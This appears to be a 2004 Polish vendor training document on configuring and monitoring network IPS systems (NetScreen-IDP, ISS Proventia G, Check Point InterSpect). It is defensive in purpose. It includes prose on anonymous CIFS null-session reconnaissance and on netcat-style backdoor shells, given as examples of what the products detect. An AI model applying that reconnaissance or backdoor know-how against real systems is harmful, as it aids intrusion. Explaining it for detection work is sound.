(Backdoor Detection, itd.) reguły posiadają na stałe włączony mechanizm Terminal CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 18

19 Pole Match jednoznacznie identyfikuje ruch sieciowy podlegający kontroli. Kto inicjuje komunikację (klient)? Z kim odbywa się komunikacja (serwer)? Czy po zidentyfikowaniu ataki w komunikacji IDP poddaje ją kontroli względem następnych reguł? Definiując reguły IDP w trybie Advanced występuje dodatkowe pole Service, określające protokoły i usługi sieciowe poddawane kontroli. Pole Look For identyfikuje zdarzenia i ataki, które IDP powinien wykrywać CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 19

20 Pole Action określa sposób działania IDP po zidentyfikowaniu zdarzenia. Jaką akcję podejmuje IDP? W jaki sposób powiadamia administratora? Gdzie obowiązuje reguła? System IDP po wykryciu zdarzenia może podejmować różne działania w zależności od trybu w jakim funkcjonuje: none brak reakcji, ignore po wykryciu ataku ruch nie jest sprawdzany względem pozostałych ataków określonych w regule polityki bezpieczeństwa, close client & server zamknięcie sesji i wysłanie pakietu RST do klienta i serwera aplikacji, close client zamknięcie sesji i wysłanie pakietu RST do klienta aplikacji, close server zamknięcie sesji i wysłanie pakietu RST do serwera aplikacji, (tylko w trybie in-line) drop packet zablokowanie pakietu bez wysyłania pakietu RST, drop connection zablokowanie połączenia bez wysyłania pakietu RST. Administrator IDP może być powiadomiony o zdarzeniu w następujący sposób: logging zapis informacji o zdarzeniu w logu, alarm zdarzenie wyświetlane jest na konsoli jako alarm (flaga w Log Viewer), session opis zdarzenia zawiera dodatkowo informacje o liczbie pakietów w sesji, liczbie bajtów oraz czasie jej trwania, SNMP Trap komunikat zwrotny do menadżera SNMP, syslog przesłanie informacji o zdarzeniu do serwera SYSLOG, send przesłanie informacji o zdarzeniu pocztą ( ), run script uruchomienie określonego skryptu lub aplikacji, 2004 CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 20

21 log packets logowanie pakietów przed wystąpieniem zdarzenia i/lub po wystąpieniu zdarzenia (np. w celu dokładnego przeanalizowania ruchu sieciowego). Definiując reguły IDP w trybie Advanced występują dwa dodatkowe pola: IP Action akcja podejmowana po wykryciu zdarzenia na kolejnych pakietach w ramach tej komunikacji (np. blokowanie przez określony czas pakietów z adresu IP, z którego wykryto atak), Severity priorytet zdarzenia. Uwaga: Ustawienia IP Action powinny zostać dobrze przemyślane przed ich zastosowaniem. Jest to bardzo mocny mechanizm w rękach administratora, którego zastosowanie należy jednak odpowiednio zaplanować. Umożliwia on blokowanie wszelkich działań intruzów w razie gdy zostało przez IDP wykryte ich niedozwolone zachowanie. Przede wszystkim nie należy stosować IP Action jako reakcję na ataki, które mogą potencjalnie być wykonane z innych adresów IP (np. IP Spoofing, adresy IP w wysyłanych przez intruzów pakietach zostały sfałszowane,) CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 21

22 System IDP dokonuje analizy ustalonego ruchu sieciowego, wykonując m.in. badania heurystyczne pod kątem wykrywania interakcyjnych sesji, wskazujących na istnienie na chronionych serwerach aplikacji typu Trojan lub Backdoor. Dla przykładu, wszystkie sesje z serwerem FTP, za wyjątkiem protokołu FTP są analizowane pod kątem istnienia aplikacji Backdoor/Trojan. W razie wykrycia nieupoważnionych prób dostępu do chronionych serwerów zabezpieczenia IDP prezentują intruzom nieprawdziwe informacje na temat dostępnych tam usług systemu informatycznego. Dla przykładu, w razie próby dostępu do usług FTP i WWW kontrolera domeny Windows 2000 intruzi uzyskują tylko pozorny dostęp do serwera, a wszystkie ich działania są monitorowane i rejestrowane CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 22

23 Ochrona serwerów w sieciach chronionych przed atakami DoS (destabilizujące, destrukcyjne) wykorzystującymi technikę SYN Flood. System IDP może po zauważeniu ataku wysłać pakiet RST do serwera TCP (metoda passive), bądź na czas dokładnego rozpoznania ataku zestawić z serwerem tymczasową sesję TCP (metoda relay). System IDP wykrywa podejrzane działania (np. skanowanie portów TCP/UDP) i reaguje na nie zgodnie z ustaleniami polityki bezpieczeństwa. Zdefiniowane reguły polityki bezpieczeństwa i ustawienia IDP są sprawdzane w następującej kolejności:» Traffic Anomalies Rulebase,» SYN-Protector Rulebase,» Network Honeypot,» Main Rulebase,» Backdoor Detection Rulebase,» Sensor Settings Rulebase CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 23

24 Administrator systemu zabezpieczeń NetScreen-IDP ma do dyspozycji narzędzia Enterprise Security Profiler służące do analizy sytuacji w systemie informatycznym oraz jego aktualnego stanu bezpieczeństwa m.in. Network View przedstawia dane o ruchu sieciowym (m.in. które komputery komunikują się z którymi i jakie usługi wykorzystują), Application View przedstawia specyficzne dane nt. aplikacji występujących na serwerach i stacjach PC w sieciach chronionych (m.in. rodzaj i wersje aplikacji), Violation View przestawia naruszenia przyjętej polityki bezpieczeństwa (skonfigurowanej w panelu Violation Objects). Konfiguracja Profiler rozpoczyna się od wskazania jakie obiekty będą śledzone przez określone sensory IDP (Edit > Configure). Zalecane jest aby wcześniej zdefiniować te obiekty za pomocą narzędzi Objects Manager CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 24

25 Następnie należy wskazać w jakim kontekście należy śledzić wskazane obiekty systemu informatycznego. Kontekst identyfikuje komputery, użytkowników oraz aplikacje (np. śledzenie logowania FTP, wprowadzanych identyfikatorów oraz wykonywanych poleceń). Po skonfigurowaniu parametrów Security Profiler należy dokonać jego uruchomienia na określonych sensorach IDP (Edit > Action). Dane rejestrowane przez sensory IDP są składowane lokalnie w bazie LDB. Przed ich analizą administrator powinien dokonać ich agregacji i korelacji na stacji zarządzającej IDP CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 25

26 ISS Proventia G Zarządzania urządzeń ISS Proventia G odbywa się z konsoli SiteProtector. Poniżej przedstawiona została procedura instalacji i konfiguracji SiteProtector. Wymagania systemowe dla SiteProtector: dedykowany komputer zawierający wyłącznie oprogramowanie ISS SiteProtector, stały adres IP procesor - min. 1 GHz Intel Pentium III, RAM -1 GB, rozdzielczość ekranu x768, system operacyjny Windows 2000 Server lub Advanced Server (SP4 lub nowszy), Adobe Acrobat Reader 5.0, Microsoft Internet Explorer 6.0 lub nowszy, Microsoft Internet Information Service 5.0 lub nowszy, Microsoft Data Access Components (MDAC) 2.7 lub nowszy, Sun Java 2 Runtime Environment (J2RE), Standard Edition, v Przed instalacją SiteProtector należy zainstalować SQL Server 2000 lub SQL Server 2000 Desktop Engine (MSDE) w wersji SP3 lub nowszej. Typowa instalacja MSDE odbywa się następująco: C:\sql2ksp3\MSDE>setup SAPWD=<haslo administratora> Następnie instalujemy JRE. Przebieg instalacji SiteProtector odbywa się w następującej kolejności: - uruchamiamy program instalacyjny SiteProtector<wersja>_DeploymentPackage.exe 2004 CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 26

27 Wstępna konfiguracja SiteProtector Wstępna konfiguracja SiteProtector odbywa się w następującej kolejności: - uruchamiamy konsolę SiteProtector Start Programs ISS RealSecureSiteProtector Console - logujemy się podając id i hasło do konta, na którym został zainstalowany SiteProtector - wprowadzamy licencje produktów zabezpieczeń Tools Manage Sensor Licenses Manage All Add wskazujemy pliki licencji (np. Realsecure.key) kontynuujemy konfigurację 2004 CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 27

28 Konfiguracja parametrów sensorów Konfiguracja parametrów sensorów zabezpieczeń ISS odbywa się w następującej kolejności: - definiujemy komputery, na których znajdują się sensory (zakładka Asset uruchamiamy Add Host) 2004 CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 28

29 - rejestrujemy moduły zabezpieczeń (zakłada Asset zaznaczamy host uruchamiamy Automatically Register Software) - wskazujemy Event Collector, który będzie pobierał logi i alarmy z modułu zabezpieczeń - weryfikacja konfiguracji parametrów sensora (zakładka Sensor zaznaczamy sensor RealSecure... Sensor Edit Properties) 2004 CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 29

30 Konfiguracji polityki bezpieczeństwa sensora Konfiguracja polityki bezpieczeństwa sensora odbywa się w następującej kolejności: - otwieramy edytor polityki bezpieczeństwa (Sensor Proventia G Apply Policy) - wybieramy wzorzec polityki (Select) - tworzymy nową politykę sensora (Derive New) - dostrajamy politykę (Network Events Attacks), a następnie ją zapisujemy i instalujemy (Apply Policy) Ustalamy odpowiednie reakcje sensora na zdarzenia: DISPLAY alarm na konsoli zarządzania, RSKILL wysłanie pakietów TCP RESET w celu zabicia sesji TCP, LOGDB zapis zdarzenia w logu, LOG EVIDENCE zapis sesji związanej ze zdarzeniem, wiadomość o zdarzeniu, 2004 CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 30

31 SNMP wiadomość SNMP Trap o zdarzeniu, OPSEC przesłanie komunikatu do firewalla Check Point w celu zablokowania określonych adresów IP, DROP zablokowanie sesji na sensorze. Aktualizacja bazy sygnatur ataków w SiteProtector może odbywać się automatycznie lub ręcznie na żądania administratora. Producent regularnie dostarcza pakiety aktualizacji Proventia XPU CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 31

32 5. Dostrajanie zabezpieczeń IPS i praktyczna ocena ich skuteczności na wykonywane ataki Check Point InterSpect Jednymi z najczęstszych problemów, z jakimi mają do czynienia administratorzy zabezpieczeń są robaki internetowe rozprzestrzeniające się za pomocą protokołu HTTP (np. CodeRed, Nimda). Robaki przenoszą się pomiędzy serwerami Web wykorzystując ich błędy bezpieczeństwa jak Unicode Bugs, Directory Traversal oraz podatności różnych modułów aplikacyjnych. Strategia ochrony przed tymi zagrożeniami zastosowana w Application Intelligence to identyfikowane robaków poprzez sygnatury w zapytaniach HTTP i ich blokowanie w czasie rzeczywistym. Mechanizm HTTP Worm Catcher umożliwia blokowanie na firewall prób przenoszenia się robaków na inne serwery Web (patrz rysunek). W razie potrzeby administrator może także definiować własne sygnatury robaków CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 32

33 Protokół CIFS (Common Internet File System) jest wykorzystywany do przesyłania zapytań do serwerów sieciowych o dostęp do plików i usług drukowania. CIFS został m.in. zaimplementowany w protokołach NetBIOS (TCP-139) oraz Microsoft-DS (TCP-445). Niewłaściwie skonfigurowane serwery CIFS pozwalają klientom na otwieranie sesji z wykorzystaniem pustego identyfikatora i hasła użytkownika. Intruzi w sposób anonimowy mogą uzyskać dostęp do współdzielonego zasobu IPC$ na komputerach Windows, a następnie odczytać wiele informacji nt. systemu (m.in. listę użytkowników i grup, listę podłączonych komputerów, listę zasobów współdzielonych). Błędy implementacji CIFS umożliwiają także wykonywanie ataków destrukcyjnych i destabilizujących DoS na serwery sieciowe Windows (patrz rysunek). Check Point IS posiada zaimplementowane mechanizmy inspekcji protokołu CIFS. Umożliwiają one szczegółową kontrolę wykorzystania zasobów sieci Windows. Dodatkowo, moduł aplikacyjnej kontroli SmartDefence może blokować połączenia CIFS Null Session. Zapewnia to ochronę przed atakami wykorzystującymi anonimowe połączenia CIFS (np. SMBdie) CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 33

34 Z wykorzystaniem narzędzi dostępnym w konsoli SmartDashboard systemu zabezpieczeń Check Point InterSpect dostrajamy globalne ustawienia polityki bezpieczeństwa CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 34

35 Juniper NetScreen-IDP System Network IPS występuje zwykle jako system uzupełniający i ubezpieczający firewall. Wdrożenie skutecznego systemu ochrony przed atakami z sieci wymaga uwzględnienia wielu aspektów i włączenia odpowiednich mechanizmów zabezpieczeń, m.in.: 1. Utrudnianie skanowania i rozpoznawania systemów. 2. Wykrywanie skanowania i prób penetracji. 3. Ochrona przed atakami exploit. 4. Wykrywanie i blokowanie połączeń z backdoor. 5. Ochrona przed atakami destrukcyjnymi i destabilizującymi (D)DoS. 6. Definiowanie nowych ataków i zdarzeń. 7. Blokowanie pakietów z niewłaściwą adresacją (Anti-Spoofing). 8. Ochrona serwisów dostępnych na niestandardowych portach. 9. Ustalenie zasad kontroli dostępu w sieci CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 35

36 Utrudnianie skanowania i rozpoznawania systemów Przed wykonaniem ataków intruzi zwykle dokonują rozpoznania obiektów ataku tak, aby dobrać odpowiednie narzędzia. Włączenie mechanizmu Network Honeypot ma na celu przekazywanie intruzom nieprawdziwych informacji nt. dostępnych usług systemu (zwykle przedstawianie usług specyficznych dla innej klasy systemów). Skanowanie portów wraz z techniką TCP/IP fingerprint pozwala intruzowi na ustalenie dostępnych usług sieciowych oraz rodzaju systemu operacyjnego serwera. W przypadku zastosowania zabezpieczeń NetScreen-IDP (Network Honeypot) intruz otrzymuje wiele nieprawdziwych informacji utrudniających prowadzenie dalszego ataku (np. na serwerze MS Windows zostają rozpoznane usługi specyficzne dla serwerów Unix) CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 36

37 Wykrywanie skanowania i prób penetracji Włączenie w polityce bezpieczeństwa kategorii ataków Network Scanner Identification ma na celu wykrywanie skanowania i prób penetracji. System zabezpieczeń identyfikuje podstawowe techniki skanowania oraz rozpoznawania systemów operacyjnych i aplikacji, a także techniki specyficzne dla określonych narzędzi (np. Nessus, NMAP). Dostępny w NetScreen-IDP mechanizm wykrywania anomalii ruchu sieciowego Traffic Anomalies odpowiada za identyfikowanie różnych technik skanowania i identyfikacji systemów, m.in.: TCP/UDP Scan - skanowanie wykrywane, gdy z jednego adresu IP w określonym czasie wykonywana jest określona liczba prób połączenia do różnych portów TCP/UDP chronionego systemu, Distributed Scan - skanowanie wykrywane, gdy z wielu adresów IP jednocześnie wykonywane jest skanowanie portów TCP/UDP chronionego systemu, ICMP Sweep skanowanie wykrywane, gdy z jednego adresu IP wysyłane są zapytania ICMP Ping do wielu adresów w sieci w celu ustalenia ich dostępności, a także Network Scan skanowanie wykrywane, gdy z jednego adresu IP wykonywane jest skanowanie portów TCP/UDP wielu chronionych systemów CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 37

38 Ochrona przed atakami exploit W polityce bezpieczeństwa NetScreen-IDP włączamy kategorie ataków exploit specyficzne dla chronionych zasobów systemu informatycznego. Dla przykładu, w przypadku chronionego serwera Microsoft Internet Information Server włączamy kategorie ataków istotne dla tego systemu (m.in. kategorie Microsoft IIS o priorytecie Critical, High i Medium). Prze obecnej liczbie sygnatur ataków, na jakiej operują systemy IDS/IPS (ponad 2,000) polityka bezpieczeństwa odgrywa bardzo istotną rolę. W systemie zabezpieczeń NetScreen- IDP jest ona oparta na jasno sprecyzowanych logicznych regułach, wynikających z realizowanych zadań ochrony wskazanych zasobów systemu informatycznego. W rozwiązaniach IPS opartych na starej generacji systemach IDS konfiguracja zabezpieczeń polega głównie na przeglądaniu bazy ataków i włączaniu/wyłączaniu sygnatur bez możliwości wskazania jakiej komunikacji dotyczą. Przez to systemy te wykonują analizę ruchu sieciowego w sposób nielogiczny (np. komunikacja do serwera DNS sprawdzana jest pod kątem ataków HTTP), a w konsekwencji wykrywają i rejestrują zdarzenia nieistotne z punktu widzenia bezpieczeństwa sieci chronionej (m.in. fałszywe alarmy). Pewnym złagodzeniem skutków braku precyzyjnej polityki bezpieczeństwa może być korelowanie rejestrowanych przez IPS logów z wynikami skanera, za pomocą którego ustala się jakie aplikacje występują na chronionych serwerach. W praktycznym działaniu jest to jednak mało pomocne, ponieważ skaner nie jest w stanie ustalić rodzaju wielu aplikacji. Serwery sieciowe ze względów bezpieczeństwa ukrywają swoją tożsamość (np. serwer pocztowy Qmail przedstawia się w sieci jako MS Exchange) CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 38

39 Dodatkowo, przez dostępne w systemie NetScreen-IDP grupy Dynamic Group administrator zabezpieczeń może definiować i używać w polityce bezpieczeństwa grupy ataków przypisane do określonych systemów operacyjnych i aplikacji. Sygnatury w grupie dynamicznej mogą zostać związane z określonymi protokołami, rodzajem i poziomem zagrożenia ataków, itp.. W momencie aktualizacji bazy sygnatur nowe ataki są automatycznie dodawane do określonych reguł i grup polityki bezpieczeństwa. Administrator zabezpieczeń może na wiele sposób zostać powiadomiony o zdarzeniu (m.in. alarm na konsolę, komunikat SNMP, wiadomość i Syslog, uruchomienie programu/skryptu, zarejestrowanie określonej liczby pakietów przed i po zdarzeniu w celu ich późniejszej analizy). Konsola zabezpieczeń IDP zawiera graficzne narzędzia Packet Viewer umożliwiające przeglądanie zawartości pakietów, w których zidentyfikowane zostały ataki. Oprócz narzędzi dostępnych w konsoli IDP zarejestrowany ruch może być także przeglądany i analizowany za pomocą innych dostępnych narzędzi (np. Ethereal) CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 39

40 Administratorzy systemu IDP mogą za pomocą graficznego edytora Signature Editor definiować własne sygnatury ataków i innych zdarzeń (np. klauzule tajności w wysyłanych wiadomościach ). System zabezpieczeń IDP posiada otwarty format sygnatur (ang. open signature format). Sygnatury ataków definiowane są z wykorzystaniem powszechnie stosowanej notacji wyrażeń regularnych (ang. regular expressions). Poniżej przedstawiony został przykład sygnatury zdefiniowanej przez administratora IDP. Przykład dotyczy wykrywania niedozwolonych znaków w wartościach parametrach (URL GET) wprowadzanych do aplikacji Web (sygnatura: (= [a-z] [0-9] [A-Z])+ Negate) CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 40

41 Wykrywanie i blokowanie połączeń z backdoor W razie przeprowadzenia udanego włamania do systemu i zainstalowania backdoor intruz bez wykonywania ataków może uzyskiwać do niego nieupoważniony dostęp. W systemie zabezpieczeń NetScreen-IDP występują dwie metody przeciwdziałania takim sytuacjom. Włączenie mechanizmu Protocol Anomaly Detection oraz sygnatur Backdoor dla chronionych zasobów systemu informatycznego (tzn. w regułach polityki bezpieczeństwa dodajemy odpowiednie kategorie Protocol Anomaly oraz Backdoor) powoduje, że ruch sieciowy sprawdzany jest pod kątem zgodności z obowiązującymi standardami dla poszczególnych protokołów. Dodatkowo należy skonfigurować mechanizm Backdoor Detection, który poprzez analizę heurystyczną wykrywa specyficzną dla backdoor interakcyjną komunikację. Dla przykładu, dzięki niemu połączenie do backdoor (NetCat na porcie 25-TCP) zostaje po krótkim czasie zablokowane przez zabezpieczenia NetScreen-IDP CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 41

42 Ochrona przed atakami destrukcyjnymi i destabilizującymi (D)DoS Podstawowa ochrona przed atakami (D)DoS realizowana jest przez mechanizm SYN- Protector. Należy włączyć go dla serwerów narażonych na ataki typu SYN-Flooding. Dodatkowo w polityce bezpieczeństwa włączamy ataki (D)DoS specyficzne dla chronionych zasobów systemu informatycznego. W razie wykrycia ataku na strategiczne zasoby systemu informatycznego NetScreen- IDP może na określony czas całkowicie zablokować dostęp dla adresów IP, z których zostały wykonane ataki. Ustawienia te powinny jednak zostać dobrze przemyślane przed ich zastosowaniem. Jest to bardzo mocny mechanizm w rękach administratora, którego zastosowanie należy odpowiednio zaplanować. Przede wszystkim nie należy stosować tego mechanizmu jako reakcji na ataki, które mogą potencjalnie być wykonane z innych adresów IP (np. ataki wykorzystujące IP Spoofing do fałszowania adresów, z których są wysyłane). Oprócz włączenia odpowiednich mechanizmów ochrony przed atakami należy także zwrócić uwagę na właściwe dostrojenie konfiguracji zabezpieczeń NetScreen-IDP tak, aby uwzględniała ona specyficzne uwarunkowania systemu informatycznego, m.in.: zdefiniowanie nowych ataków i zdarzeń (np. blokowanie specyficznych dla danego kraju aplikacji P2P), ochronę serwisów na niestandardowych portach (tzn. zdefiniowane nowych serwisów i dodanie ich do odpowiednich reguł polityki bezpieczeństwa), blokowanie pakietów z niewłaściwą adresacją (m.in. włączenie mechanizmu Spoofing Detection w celu blokowania napływających z Internetu pakietów zawierających adres źródłowy IP należący do sieci wewnętrznych), ustalenie zasad kontroli dostępu w sieci (np. blokowanie niedozwolonych połączeń z DMZ do sieci wewnętrznej; system NetScreen-IDP może w tym przypadku pełnić rolę firewall) CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 42

43 ISS Proventia G Dostrajanie zabezpieczeń ISS Proventia G odbywa się w edytorze polityki bezpieczeństwa, gdzie określone sygnatury ataków można wyłączyć/włączyć oraz ustalić dla nich indywidualny zestaw reakcji. Do pozostałych elementów dostrajania konfiguracji zabezpieczeń Proventia G można zaliczyć: 1. Ustawienie reakcji na określone sesje sieciowe (np. blokowanie sesji FTP). 2. Zdefiniowanie nowych zdarzeń (np. na konto administratora) CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 43

44 3. Ustalenie komunikacji ignorowanej przez sensory. 4. Ustalenie ataków ignorowanych przez sensory CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 44

45 5. Konfiguracja filtru pakietów (listy ACL) CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 45

46 6. Zarządzanie bezpieczeństwem systemach Network IPS Check Point InterSpect W systemie zabezpieczeń Check Point InterSpect analiza rejestrowanych zdarzeń odbywa się za pomocą narzędzi SmartView Tracker. Generowanie raportów i statystyk z logów InterSpect odbywa się za pomocą SmartView Reporter CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 46

47 W wykorzystaniem narzędzi SmartView Monitor administrator systemu zabezpieczeń Check Point InterSpect analizuje występujące naruszenia bezpieczeństwa CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 47

48 ISS Provetia G Monitorowanie bezpieczeństwa w SiteProtector odbywa się za pomocą wyświetlanej w czasie rzeczywistym listy Security Alerts, gdzie przedstawiane alarmy mogą być poddawane analizie. Dodatkowy moduł Fusion Module umożliwia korelację zdarzeń rejestrowanych przez systemy IDS/IPS z wynikami skanera Internet Scanner CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 48

49 Raporty generowane z logów historycznych składowanych w bazie Microsoft SQL umożliwiają poddawanie analizie danych skorelowanych. Konsola SiteProtector zawiera listę predefiniowanych raportów. Własne raporty mogą być dodawane za pomocą oprogramowania Cristal Reports CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 49

50 Juniper NetScreen-IDP Monitorowanie stanu bezpieczeństwa Graficzna konsola Dashboard wyświetla w czasie rzeczywistym wybrane statystyki z funkcjonowania sieci i zabezpieczeń (m.in. najczęściej wykonywane ataki, najczęstsze źródła ataków, najczęstsze cele ataków, status elementów systemu zabezpieczeń). Czas odświeżania danych na ekranie ustala się w konfiguracji Edit Set Refresh Interval CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 50

51 Analiza rejestrowanych zdarzeń Administrator NetScreen-IDP na bieżąco dokonuje analizy bezpieczeństwa systemu informatycznego z użyciem dedykowanych narzędzi. Za pomocą Log Viewer przegląda zdarzenia zarejestrowane przez poszczególne sensory IDP. W czasie rzeczywistym wyświetlane są rekordy logów w formacie tabeli z możliwością definiowania specyficznych reguł filtracji oraz selekcji danych. Zdarzenia mogą być także przeglądane za pomocą polecenia logviewer. Zdarzenia zarejestrowane w logu IDP mogą zostać zapisane do innego formatu (m.in. pliku PDF, Postscript, XML, CSV) lub wyeksportowane do bazy SQL, serwera Syslog, menadżera SNMP, bądź przesłane na wskazane konto serwera SMTP. Odbywa się to z konsoli GUI oraz polecenia log2action CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 51

52 Administrator IDP przeglądając zarejestrowane zdarzenia za pomocą Log Viewer może szybko dowiedzieć się, jaki jest dokładny opis zdarzenia (definicja sygnatury ataku), na podstawie której reguły i polityki został stworzony wpis oraz jak dokładnie przebiegała sesja, w której dokonano ataku CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 52

53 Wykrywanie i wyjaśnianie naruszeń bezpieczeństwa Dane odczytywane z wielu sensorów IDP są za pomocą Log Investigator poddawane w czasie rzeczywistym korelacji i analizie. Administrator zabezpieczeń bez konieczności generowania raportu z logów historycznych może dowiedzieć się kto wykonywał ataki na określone zasoby w sieciach chronionych, ile takich zdarzeń wystąpiło w określonym czasie oraz jakie ataki i błędy bezpieczeństwa zostały przez intruzów wykorzystane. Za pomocą Log Investigator administrator zabezpieczeń na jednym ekranie przegląda interakcyjną tabelę z zestawieniem listy intruzów i zaatakowanych przez nich systemów (oś Y i X). W polach tabeli Log Investigator znajduje się liczba wykrytych ataków. Dane zawarte w tabeli odnoszą się do wskazanego przez administratora okresu czasu (np. ostatnie 2 godziny). Prawym przyciskiem myszki administrator odczytuje z tabeli jakie dokładnie ataki zostały wykonane przez intruza, jakie usługi były atakowane, w jakim czasie zostały wykonane ataki oraz inne dane z tym związane (np. reakcja systemu zabezpieczeń) CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 53

54 Przeglądane w Log Viewer zdarzenia mogą zostać za pomocą Quick Report poddane korelacji w czasie rzeczywistym w odniesieniu do innych, związanych z nimi zdarzeń (np. w czasu ostatnich 12 godzin). W celu dokładniejszego wyjaśnienia zdarzeń administrator może przeanalizować sesje związane z zarejestrowanymi atakami (np. 20 pakietów przed i 10 pakietów po ataku). W systemie zabezpieczeń IDP dostępne są do tego celu odpowiednie narzędzia (Packet Viewer). Administrator może to także zrobić z wykorzystaniem innych posiadanych narzędzi (np. Ethereal) CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 54

55 Konsola GUI za pomocą narzędzi Report Manager prezentuje tworzone w czasie rzeczywistym zestawienia i statystyki. Administratorzy mają do dyspozycji ponad 20 predefiniowanych raportów. W razie potrzeby mogą definiować dowolne własne raporty CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 55

56 Wykrywanie sytuacji przełamania zabezpieczeń System zabezpieczeń Juniper NetScreen-IDP w zakresie zarządzania bezpieczeństwem posiada unikalny mechanizm Enterprise Security Profiler. Umożliwia on administratorom wykrywanie sytuacji, kiedy zabezpieczenia systemu informatycznego zostały przełamane (np. atak został wykonany od wewnątrz, intruz wykorzystał do ataku zero day exploit ). Zakres praktycznych zastosowań tego mechanizmu jest b. duży, m.in.: 1. Security Profiler na bieżąco zbiera i automatycznie aktualizuje informacje na temat występujących w sieciach chronionych komputerów oraz zainstalowanych na nich aplikacjach. System zabezpieczeń IDP podnosi alarm w razie zauważenia nowych komputerów bądò aplikacji w sieciach chronionych. Dodatkowo administrator zabezpieczeń za pomocą dedykowanych graficznych narzędzi może sprawdzić jakie zmiany wystąpiły w sieci w określonym okresie czasu (m.in. nowe komputery, nowe aplikacje i otwarte porty). Dzięki temu może wykryć podłączony do sieci wewnętrznej komputer intruza, bądò zainstalowane aplikacje Backdoor/Trojan. 2. Administrator zabezpieczeń IDP za pomocą Security Profiler może bez konieczności skanowania sieci dowiedzieć się jakie wersje aplikacji serwerów i stacji roboczych znajdują się w sieciach chronionych. Na tej podstawie może wykonać analizę podatności systemu informatycznego na znane błędy bezpieczeństwa oraz w razie zauważenia ataku zweryfikować, czy atakowany system jest na to zagrożenie podatny. Sensory IDP analizują komunikację sieciową, odczytują z niej i zapamiętują informacje specyficzne dla użytkowników, komputerów i aplikacji, które mogą być przydatne w procesie zarządzania bezpieczeństwem (m.in. adresy MAC i IP, nazwy NetBIOS, rodzaje kart sieciowych, rodzaje i wersje klientów i serwerów aplikacji, polecenia wydawane aplikacji, itd.). Wykorzystując Security Profiler administrator zabezpieczeń może szybko ustalić jakie zmiany wystąpiły w sieci w określonym czasie (m.in. zidentyfikować nowe aplikacje i otwarte porty, nowe komputery) i dzięki temu wykryć zainstalowane aplikacje Trojan i nielegalnie podłączone do sieci wewnętrznej komputery intruzów, a nawet pracowników łamiących zasady użytkowania systemu informatycznego. Na poniższych rysunkach został przedstawiany efekt połączenia z Trojanem Luzak, jaki został zarejestrowany przez IDP Security Profiler CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 56

57 Powiadomienie administratorów o wykryciu nowego otwartego portu na serwerze Wykrywanie aplikacji Trojan na podstawie analizy zmian w sieci chronionej 2004 CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 57

58 Inną dostępną w systemie zabezpieczeń Juniper NetScreen-IDP metodą wykrywania połączeń z Trojanami jest analiza heurystyczna komunikacji sieciowej. W systemie IDP oprócz detekcji Trojanów poprzez sygnatury i analizę zmian w sieci (Security Profiler) został zaimplementowany do tego celu dedykowany mechanizm Backdoor Detection. Jego działanie polega na wykrywaniu sesji interakcyjnych, typowych dla połączeń z aplikacją Trojan. Metoda ta jest skuteczna w sytuacji, gdy intruz nawiązuje połączenie z zainstalowanym wcześniej Trojanem i komunikacja ta jest monitorowana przez zabezpieczenia IDP. Taka sytuacja może wystąpić gdy Trojan został zainstalowany w sieci wewnętrznej przez użytkownika (umyślnie lub nieświadomie), bądź na skutek ataku exploit, który nastąpił z wykorzystaniem nie opublikowanego błędu bezpieczeństwa lub od wewnątrz sieci z pominięciem zabezpieczeń IPS. Działanie mechanizmu Backdoor Detection jest skuteczne dla większości dostępnych w Internecie aplikacji exploit. Aplikacje te uruchamiają na atakowanym serwerze ñshellcode, poprzez który intruz uzyskuje dostęp do konsoli zarządzania systemu operacyjnego. Zwykle połączenie z serwerem nie jest szyfrowane. Dopiero poprzez to połączenie intruz może skopiować i zainstalować na serwerze dedykowaną, zwykle trudną do wykrycia aplikację Trojan (np. Setiri). System zabezpieczeń IDP po kilku sekundach pracy intruza z Trojanem blokuje sesję i wyświetla alarm o wykryciu na serwerze nielegalnej aplikacji (patrz rysunek). Wykrycie połączenia z Trojanem poprzez analizę heurystyczną komunikacji sieciowej 2004 CLICO SP. Z O.O. WSZELKIE PRAWA ZASTRZEŻONE 58

